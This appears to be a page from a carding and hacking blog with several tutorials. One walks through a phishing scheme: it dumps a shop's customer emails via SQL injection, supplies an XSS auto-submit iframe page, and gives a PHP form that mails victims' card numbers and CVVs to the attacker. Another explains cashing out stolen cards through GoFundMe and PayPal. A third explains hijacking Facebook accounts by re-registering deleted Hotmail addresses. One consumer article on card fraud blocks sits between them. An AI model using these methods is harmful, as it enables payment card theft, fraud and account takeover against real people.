How to create a Phishing Website

First, you need to find yourself a vulnerable shop. Won't go into too many details here, this should be pretty drilled into your head by now. You can do this with Google Dorks manually, or use tools like WebCruiser, SQLi poison, etc. What your looking for is a shop with both SQLi vulnerabilities, and XSS vulnerabilities.

First, as you may have noticed on most databases containing CC info, it's encrypted, MD5, FPE, whatever it is it's not feasible to work with that. However, one thing you can work with is the current and former customer's e-mail addresses. Go ahead and rip the whole table with the customer information. If you're lucky, you'll get at least 10,000 e-mail addresses or more.

Next, you need to work with the XSS vulnerability. I've noticed the most common being POST vulnerability, so I'll go that route, but you can incorporate it with FORM or whatever.

You can use the following code to make a redirect.html or whatever you wish to name it. This page will load the vulnerable website immediately, with one exception, a giant IFRAME over it which of course is going to be another page you make.

PHP Code:

<html>
<head>
<script language=javascript>
function submitPostLink()
:zin:{
document.postlink.submit();
}
</script>
</head>
<body onload="submitPostLink()">
<form action="http://www.XXXXXXXcom/TextSearch.asp" name=postlink method="post">
<input type="hidden" name="NAMEOFVULNERABLEFIELD" value="<iframe src=&quot;Ecommerce Web Site Hosting and Streaming from YourHost.com width=&quot;800&quot;height=&quot;2400&quot; style=&quot;z-index: 0; position: absolute; top: 0; left: 0; overflow-y: hidden;&quot; frameborder=0 align=center></iframe>">
</form>
</body>
</html> 

Go ahead and goto the checkout page for the site you're working with, and save the page to your hard drive, including all the subdirectory files and images (firefox does this auto). Now, you need to edit the main file you just saved.

Search for "action=", and change the page following it to your third page you will make, which will be the PHP mail form that will send your e-mail all the information someone fills in the form. The code will look something like....

PHP Code:

<?php
$userinfo = "@com"; //your email here
$ip = getenv("REMOTE_ADDR");
$message .= "".$_POST['firstname']."\n";
$message .= "".$_POST['lastname']."\n";
$message .= "".$_POST['org_name']."\n";
$message .= "".$_POST['telephone']."\n";
$message .= "".$_POST['fax']."\n";
$message .= "".$_POST['email']."\n";
$message .= "---------------------------------------------\n";
$message .= "".$_POST['cctype']."\n";
$message .= "".$_POST['credcard']."\n";
$message .= "".$_POST['exp_mon']."\n";
$message .= "".$_POST['exp_year']."\n";
$message .= "".$_POST['cccvv']."\n";
$message .= "".$_POST['ccname']."\n";
$subject="SUBJECT - $ip";
$headers = "From: NAMEl<@.com>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
mail($userinfo,$subject,$message,$headers);

You'll want to follow this code with some html code that also looks like a copy of their site but with some text saying something along the lines of "sorry, this offer is no longer available" or something of the sort. I'll explain why right now.

After putting all this together and uploading it to a host, you'll want to shorten youre redirect.html URL, you can use *******, or another shortening service. Then, you can send an e-mail to all the customers e-mail addresses, (AND YOU CAN BE CREATIVE), but something along the lines of them being a valuable customer, and because of that, you're giving them one of your newest products for only 99 cents! Make sure that on your checkout form, you list the item you choose, so they see it when they're checking out.

A great service to send bulk mail for FREE, and no trial or anything, that is if you don't have hacked SMTP to use, is targethero.com

They let you send Unlimited e-mails to up to 5,000 different contacts. Not bad for free. You'll have to confirm your account with a cell phone, but you should just use receive-sms-online.com or freesmsreceive.com/index.php where you can get SMS sent to you with no registration.

Trust me, if you send enough e-mails to former customers, especially when it's in the health and supplement niche, if they get an offer for a 99 cent bottle or something, they're gonna jump all over that!

Anyway, if you have any questions, please feel free to ask, and I apologize if I was a little vague but I don't have much time right now but wanted to get this up.

Read More

Paypal Filing Tutorial

Paypal Filling Tutorial


1. Go to the following page: http://www.gofundme.com/

2. Create an account
3. Verifies the account (gets an e-mail with a link)
4. Log in to your account and go to the top right of My Pages
5. Set Goal Amount to $100.00
6. Page Title and Page Color is up to you
7. Photo or Video, add a photo of your choice.
8. Page Message, you can write in whatever you want.
9. Activate Extras please do not click or activate anything
10. Go to SAVE.
11. Go back to My Page then there should be your page, click on it.
12. Click on Page Link on the left and choose a URL of your choice
13. After saving, you'll see a message "Custom Page Link Created"
14. Copy your link somewhere you will need.
15. Go to the top right corner and click on Account Settings.
16. Link your Paypal account with your GoFundMe account.
17. After you do that, log out of your account!
18. Go to your link (do not be logged in) and right click DONATE!
19. Select the amount on the next page, name, email, country, zip code (use data from the CC in www.leakeddata.me or www.leakeddata.cc)
20. Click on CONTINUE and make the paypal guest payment using a Random CC.
21. If you are doing everything right you should have the money on your Paypal account shortly.

Read More

Seven Reasons Credit Card Gets Blocked

Plus: 7 tips for handling it when it happens to you  When your credit card company stops a thief from charging fraudulent expenses to your card, you're thrilled. But what happens when they mistake you for the thief? 

7 reasons your credit card gets blocked with $6.89 billion in fraud losses in 2009, credit card companies eager to stem the tide are continually beefing up their anti-fraud measures, relying on sophisticated computer software to flag suspicious transactions. Trouble is, what looks like a red flag to a computer may just be you trying to make a mundane purchase. Then, all of a sudden, your card's declined, leaving you red-faced and frustrated. 

So what looks bad to your card company? Anything out of the ordinary. "The credit card companies -- Visa, MasterCard, American Express, Discover -- al l have their own proprietary technologies that look for anomalies in your s pending habits," says Robert Siciliano, a McAfee consultant and identity theft expert based in Boston. Siciliano suggests that each transaction is automatically analyzed for up to 200 different data points, everything from where you live to what you normally buy to how much you're spending, to deter mine the likelihood that you're the one actually making a particular charge . If the analysis doesn't add up, your card will be blocked and your next purchase declined. 

What triggers a block Card issuers won't go on the record about specific red flags -- as Siciliano points out, "That'll only give the bad guys an edge." But according to experts and hapless cardholders who have experienced a block, these shopping habits may lead to hassles: 

    Shopping where you've never shopped before. "I've had calls from my car d company saying, ‘We've detected unusual activity.' It wasn't unusual, but it was a different pharmacy than the one I normally went to," says Denise Richardson, a certified identity theft risk management specialist and author of "Give Me Back My Credit!"   

Making several purchases quickly. Janis Badarau, of Lavonia, Ga., sometimes hits three grocery stores in a row to find what she needs and take advantage of sales. But a few months ago, she was so speedy that by the time she swiped her card at the third store, it was declined. "I called the bank when I got home, and they told me that shopping at three supermarkets within an hour or so was considered 'unusual activity,'" Badarau says.     

Charging something small, then something big. Criminals sometimes test t he waters with a stolen card by charging a tiny amount -- say, a song on iTunes -- before moving on to a triple-digit purchase. That small-big pattern i n your own buying habits may result in a declined card.     

Shopping away from your home base. That's especially common when you'r e moving. "If my billing address is Massachusetts and I'm buying a washer and dryer in Idaho, that's an anomaly, because why would I buy a washer an d dryer in Idaho if I live in Massachusetts?" says Siciliano.     

Charging travel expenses. On the road, any purchase from gas to restaurant meals can trigger a block. While that's long been true for travelers abroad , it now happens domestically, too. "Once my travel to L.A. flagged it and I spent 20 minutes verifying transactions," says Traci Coulter, of New York Cit y. When she asked what caused the card to be declined, she was told, "a taxi, a charge at the airport, in-air Wi-Fi and a rental car hold" -- all standard travel expenses.     

Buying things in different geographic regions on the same day. During a cruise, Janet Gillis, of Tampa, Fla., used a card to get money from an ATM o n the ship, then she later made a purchase on-shore in Belize. For the rest of the trip, her card was declined. "Apparently, the ATM on board the ship i s registered to a Miami location, and several hours later, I was purchasing something in Belize. To them, it looked suspicious because the transactions happened so close together," says Gillis. Online purchases to merchants in different parts of the world can trigger the same flag.     Dealing with billing issues. When Siciliano wanted to make an addition to an online purchase, he contacted the company, but the second transaction they tried to process was declined. The card issuer "thought that the merchant was taking advantage of my card number." 

How to handle a block When your card company suspects suspicious activity, sometimes you'll get a n email or a phone call asking you to verify a purchase. Other times your card is simply declined, with no advance warning and no information why, and it's up to you to call your issuer and sort out the problem. Follow these tips to minimize the hassle (and humiliation) of a blocked card: 

    Carry backup credit cards. You'll be able to offer another working card while you sort out the problems with the first.     Keep your card's contact info handy. "Have your credit card company's t oll-free number as one of your phone numbers in your mobile," recommends Siciliano. "If a card is declined, you know who to call."     

Tell your card company when you're traveling. Advance notice doesn't always keep your travel purchases off the "suspicious activities" list, but card companies recommend it. In the same vein, "Give your creditor your cell phone number," says Richardson. "If they only have your home number on fil e, that can be a problem, too."     

Use a prepaid card. When you travel, a preloaded card gives you the convenience of credit without the hassles. (You do lose the protection, however, so that convenience comes with a price.)     

Get texts. According to Chase representative Gail Hurdis, customers can sign up to receive a text message within minutes of a flagged transaction and can indicate by text whether they recognize it. If they do, the account is up dated and the transaction cleared instantly.     

Provide a new address. When you move, quickly update your billing ad dress so your card company recognizes your new home base.     

Ask for compensation. When Linsey Knerl's card was erroneously declined , the store cashier refused to accept any other card, forcing Knerl to abandon a cart full of stuff. The Tekamah, Neb., woman wrote a letter to her is suer expressing her disappointment. "The credit card company actually gave me a rewards points bonus for my troubles -- enough to buy a plane ticket t he next time I traveled!" she says. 

Annoying as it can be to get blocked by mistake, remind yourself that it's a sign that your credit card company's got your back. 

Read More

Ultimate Guide to Hack Facebook Account - Email Pruning

Working Method to Hack Facebook Account

Email Pruning 

Old emails are frequently pruned and deleted. That's how some people even jack original emails and earn some money for themselves. This is not guaranteed to work all times, but it does indeed work and has been applied in the past. 

Step 1: 

Sign into your Hotmail email (associated with your Facebook account as the primary email address) on your Phone. Simultaneously, sign into the Facebook and Messenger apps. 

Step 2: 

Open Messenger and click "Add Friends" from the drop down menu. 

Step 3: 

Open Facebook and click "Add People From" 

Step 4: 

After all contacts have loaded, click on "select from your contact list" 

Step 5: 

Scroll all the way down and look for "Not yet on Windows Live" and click it. This will bring a list of people who don't have Windows Live, or those who didn't use their accounts and their accounts were pruned. 

Step 6: 

Pick someone who has a @live.com or @hotmail.com and copy that email address and sign up on Hotmail 

Step 7: 

Go to Facebook, type that email address and click on "Forgot Password" 

Final Step: 

Reset the password via the email and you've successfully jacked the account. 

That's it, a simple method that's extremely easy to understand too.

If you have any questions and other method on hacking Facebook Account, feel free to comment below. 

Read More